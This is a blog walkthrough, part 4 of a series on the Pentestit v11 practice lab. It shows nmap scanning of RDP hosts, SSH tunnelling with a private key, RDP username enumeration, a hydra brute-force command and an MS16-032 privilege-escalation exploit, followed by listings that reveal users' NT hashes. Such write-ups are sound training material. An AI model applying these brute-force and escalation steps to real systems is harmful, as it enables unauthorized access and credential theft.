Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 4

 

Site 2 RDP Hosts

From the ssh server in site 2 we find that nmap is built in and we launch a basic nmap against the 3 servers outlined in the lab map image:

nmap -Pn 192.168.13.1-3

Starting Nmap 6.47 ( http://nmap.org ) at 2017-07-26 20:07 MSK
Nmap scan report for 192.168.13.1
Host is up (0.0015s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.13.2
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.13.3
Host is up (0.0011s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 3 IP addresses (3 hosts up) scanned in 30.13 seconds

All three hosts appear to only have one port open: RDP port 3389.
Opening rdesktop without any user specified allows us to view the available windows user accounts on each of the servers:
NOTE: if your using sshuttle then use the below command with the full ip, if using ssh -L ie: ssh -L 3389:192.168.13.1:3389 tech@192.168.101.11 -p 2222 -i ~/pentestit/office2pkey.rsa then replace the rdesktop ip with 127.0.0.1 and note you need to disconnect / reconnect for each ip in turn.

rdesktop 192.168.13.1 -u ""
rdesktop 192.168.13.2 -u ""
rdesktop 192.168.13.3 -u ""

The following 3 user accounts were enumerated:

  • arm554, arm550 and arm672

We can now test the user accounts with crowbar or hydra and see if its possible to bruteforce the rdp user accounts and gain access, as i have had ltd success with crowbar i opted for hydra; this proved successful and took only a few minutes to return the password:

  • Mapped 192.168.13.1 to local port 3389

    ssh -L 3389:192.168.13.1:3389 tech@192.168.101.11 -p 2222 -i ~/pentestit/office2pkey.rsa

     

  • Launched Hydra against localhost port 3389:
    hydra -t 8 -V -l arm554 -P rockyou.txt rdp://127.0.0.1

 

Once in on rdesktop we find the rdp host is a windows 7 32 bit host:

While enumerating the host for the token and any other information we find the arm554 user has limited permissions and is unable to view other users files or hidden files, so based on this a search in google is conducted for privilege escalation exploits that we can run in cmd or powershell. Based on the host detail the search returns an MS16-032 exploit and at the top of the list is a powershell exploit which is ideal and saves the extra milestones of compiling exploits: https://www.exploit-db.com/exploits/39719/

Once added to powershell and executed we gain NT Authority\System privileges.

TOKEN FOUND:

Enumerating OLD test.lab users directory which reveals:

  • disabled user accounts.
  • removed user accounts.
  • NT hash – could potentially be used later on for a pass the hash attack?

 

C:\Users\user\Old test.lab users>dir
 Volume in drive C has no label.
 Volume Serial Number is B443-9C96

 Directory of C:\Users\user\Old test.lab users

06/30/2017  01:38 AM    <DIR>          .
06/30/2017  01:38 AM    <DIR>          ..
06/30/2017  12:42 PM    <DIR>          arm440
06/30/2017  12:43 PM    <DIR>          arm441
06/30/2017  12:44 PM    <DIR>          arm550
06/30/2017  01:38 AM    <DIR>          arm553
06/30/2017  01:38 AM    <DIR>          arm554
06/30/2017  12:44 PM    <DIR>          arm664
06/30/2017  06:17 PM    <DIR>          arm672
               0 File(s)              0 bytes
               9 Dir(s)  23,640,113,152 bytes free

C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>

C:\Users\user\Old test.lab users\arm440
C:\Users\user\Old test.lab users\arm441
C:\Users\user\Old test.lab users\arm550
C:\Users\user\Old test.lab users\arm553
C:\Users\user\Old test.lab users\arm554
C:\Users\user\Old test.lab users\arm664
C:\Users\user\Old test.lab users\arm672
C:\Users\user\Old test.lab users\arm440\New Text Document.txt
C:\Users\user\Old test.lab users\arm441\New Text Document.txt
C:\Users\user\Old test.lab users\arm550\New Text Document.txt
C:\Users\user\Old test.lab users\arm554\New Text Document.txt
C:\Users\user\Old test.lab users\arm664\New Text Document.txt
C:\Users\user\Old test.lab users\arm672\New Text Document.txt
C:\Users\user\Old test.lab users>dir arm440
 Volume in drive C has no label.
 Volume Serial Number is B443-9C96

 Directory of C:\Users\user\Old test.lab users\arm440

06/30/2017  12:42 PM    <DIR>          .
06/30/2017  12:42 PM    <DIR>          ..
06/30/2017  12:43 PM               111 New Text Document.txt
               1 File(s)            111 bytes
               2 Dir(s)  23,640,113,152 bytes free

C:\Users\user\Old test.lab users>type "arm440\New Text Document.txt"
F12A08F680CD09E4194D463C8AE6DA0C

Shares:
docs
files
work
monthly

C: 20GB
D: 160 GB

Removed? - Yes
C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>dir arm441
 Volume in drive C has no label.
 Volume Serial Number is B443-9C96

 Directory of C:\Users\user\Old test.lab users\arm441

06/30/2017  12:43 PM    <DIR>          .
06/30/2017  12:43 PM    <DIR>          ..
06/30/2017  12:43 PM               109 New Text Document.txt
               1 File(s)            109 bytes
               2 Dir(s)  23,640,113,152 bytes free

C:\Users\user\Old test.lab users>type "arm441\New Text Document.txt"
F9AFDABB06F9A9F7ACE4BF62FA8774D1

Shares:
docs
files
work
daily

C: 20GB
D: 160 GB

Removed? - Yes
C:\Users\user\Old test.lab users>type "arm550\New Text Document.txt"
E6EDF69B1F8F5A33E927FC4F580F4005

Shares:
docs
files
work

C: 20GB
D: 160 GB

Removed? - Yes
C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>type "arm554\New Text Document.txt"
6361DEA164EE8FE91FE7B117FBC9CA5E

Shares:
docs
files
work
monthly

C: 20GB
D: 160 GB

Removed?
C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>type "arm664\New Text Document.txt"
Removed
C:\Users\user\Old test.lab users>type "arm672\New Text Document.txt"
Disabled
C:\Users\user\Old test.lab users>

At this point it was not possible to gain access to .2 and .3 servers however we do not need them as we now have the following items:

  • Site 2 SSH private key
  • Site 2 => Site 1 openvpn credentials
  • Usernames list
  • User NT hashes
  • Potential wordlist theme centred around starwars…

Let the work begin……

Part 5….

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019